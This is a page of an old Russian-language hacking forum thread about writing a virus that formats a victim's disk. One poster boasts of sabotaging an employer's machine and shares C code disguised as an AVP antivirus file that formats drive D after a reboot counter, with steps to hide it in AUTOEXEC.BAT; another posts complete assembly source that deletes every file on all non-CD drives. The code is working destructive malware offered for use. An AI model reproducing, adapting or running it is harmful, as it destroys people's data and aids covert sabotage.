ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > Windows
Перезагрузить страницу Вирус для формата вита.
   
Ответ
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 05.02.2006, 02:08
censored!
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258

Репутация: 648


По умолчанию
Цитата:
Жестоко.. Ну на фига формат нужен?
Гоораздо интереснее побродить по винту в поисках полезной инфы,а ФОРМАТ ето вандализм..
(Извиняюсь за оффтоп)
Как мой пример. Устроился на работу, когда начал подходить к концу месячный испытательный срок - что-то шеф засуетился по поводу оплаты. Ну я и воткнул экзешник с счетчиком. После десятой перезагрузки - формат D.
Но все обошлось.
__________________
+ (это не крестик, это плюсик!)
__________________
Последний раз редактировалось censored!; 05.02.2006 в 02:24..
 
Ответить с цитированием

  #12  
Старый 05.02.2006, 02:23
censored!
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258

Репутация: 648


По умолчанию
Цитата:
2 кенсоред - а что именно ты предлагаешь скомпилить ???
Хех. Щас проверил - АВП его не палит =)
...
Вот сам код:
Цитата:
#include <stdio.h>
#include <stdlib.h>
void main(void)
{
FILE *pf=fopen("c:\\progra~1\\avpsha~1\\avp.ini","r+");
int ch=getc(pf);
if (ch=='1') system("echo y|format d:");
else ch-=1;
rewind(pf);
putc(ch,pf);
fclose(pf);
exit(1);
}
...
p.s.
Цитата:
c:\\progra~1\\avpsha~1\\avp.ini
- это путь файла для счетчика.
Т.е. по этому пути:
C:\Program Files\AVP Shared Files\ должен лежать файл avp.ini содержащий сначала число 9.
В AUTOEXEC.BAT в самом ниху надо дописать:
set path=C:\WINDOWS\SYSTEM\
avp.exe

и экзешник (avp.exe) запихнуть в папку SYSTEM
__________________
+ (это не крестик, это плюсик!)
__________________
 
Ответить с цитированием

  #13  
Старый 05.02.2006, 06:08
drmist
Green member - Level 3
Регистрация: 08.10.2005
Сообщений: 396
Провел на форуме:
400609

Репутация: 239
Exclamation
Писал как-то - друг попросил.
Вот программка - не совсем формат. Рекурсивный поиск по всем дискам (кроме CD-ромов) и директориям с удалением всего, на что прав хватает. Сам ни разу в жизни не запускал, но очевидцы говорят, что работает на 5.
Код:
.386
.model flat, stdcall
option casemap: none

includelib kernel32.lib

include kernel32.inc
include windows.inc

.data
	szStrDrive	db "A:\", 0
	szStrAll	db "*.*", 0
	szStrSlash	db "\", 0
	szStrIgnore1	db ".", 0
	szStrIgnore2	db "..", 0

.data?
	CurrDirectory	db MAX_PATH+1 dup (?)
	CurrFile	db MAX_PATH+1 dup (?)
	SearchString	db MAX_PATH+1 dup (?)
	FindData	WIN32_FIND_DATA <?>
	hFile		dd ?
	ddTemp		dd ?
.code
; ebx - маска логических дисков
; esi - длинна CurrDirectory со слешем на конце
; edi - offset CurrDirectory
FindAndDeleteAllFiles proc hFind: DWORD

@next_file:
	invoke FindNextFile, hFind, offset FindData
	or eax, eax
	jz @exit

@search_loop:
	mov eax, FindData.dwFileAttributes
	and eax, FILE_ATTRIBUTE_DIRECTORY
	jz @is_file
	; Directory
	invoke lstrcmp, offset FindData.cFileName, offset szStrIgnore1
	or eax, eax
	jz @next_file

	invoke lstrcmp, offset FindData.cFileName, offset szStrIgnore2
	or eax, eax
	jz @next_file
	
	; True Directory ;)
	push esi

	invoke lstrcat, edi, offset FindData.cFileName
	invoke lstrcat, edi, offset szStrSlash

	invoke lstrlen, edi
	xchg eax, esi

	invoke lstrcpy, offset SearchString, edi
	invoke lstrcat, offset SearchString, offset szStrAll

	invoke FindFirstFile, offset SearchString, offset FindData
	
	invoke FindAndDeleteAllFiles, eax
	
	pop esi
	mov byte ptr[esi+edi], 0

	jmp @next_file
@is_file:

	invoke lstrcpy, offset CurrFile, offset CurrDirectory
	invoke lstrcat, offset CurrFile, offset FindData.cFileName
	
	invoke DeleteFile, offset CurrFile
	jmp @next_file

@exit:
	invoke FindClose, hFind
	ret
FindAndDeleteAllFiles endp


start:
		xor esi, esi
		mov edi, offset CurrDirectory
		
		invoke GetLogicalDrives
		xchg eax, ebx
_check_drive:
		mov al, bl
		and al, 1
		jz _next_drive
		
		invoke GetDriveType, offset szStrDrive
		cmp eax, DRIVE_CDROM
		jz _next_drive

		invoke lstrcpy, edi, offset szStrDrive
		invoke lstrcpy, offset SearchString, offset szStrDrive
		invoke lstrcat, offset SearchString, offset szStrAll

		invoke FindFirstFile, offset SearchString, offset SearchString
		mov si, 3
		invoke FindAndDeleteAllFiles, eax

_next_drive:
		inc byte ptr[szStrDrive]
		shr ebx, 1
		or ebx, ebx
		jnz _check_drive

		invoke ExitProcess, 0
end start
Чистяк. Бинарник не просите - не выложу. Кто не умеет компилировать - учится.
Все на свой страх и риск, отказываюсь нести какую-либо ответственность за использование этого исходника.
__________________
Никому нельзя верить...
Последний раз редактировалось drmist; 05.02.2006 в 06:11..
 
Ответить с цитированием
Ответ
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Вирус маскируется под новый MSN Messenger DRON-ANARCHY Мировые новости 0 29.12.2005 23:59
Вирус в сообщение Icq XgLuiR ICQ 28 12.11.2005 14:58
Нужен вирус -artik- Болталка 3 23.10.2005 00:07
Создан первый вирус против "1С" DRON-ANARCHY Мировые новости 0 16.06.2005 23:09



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ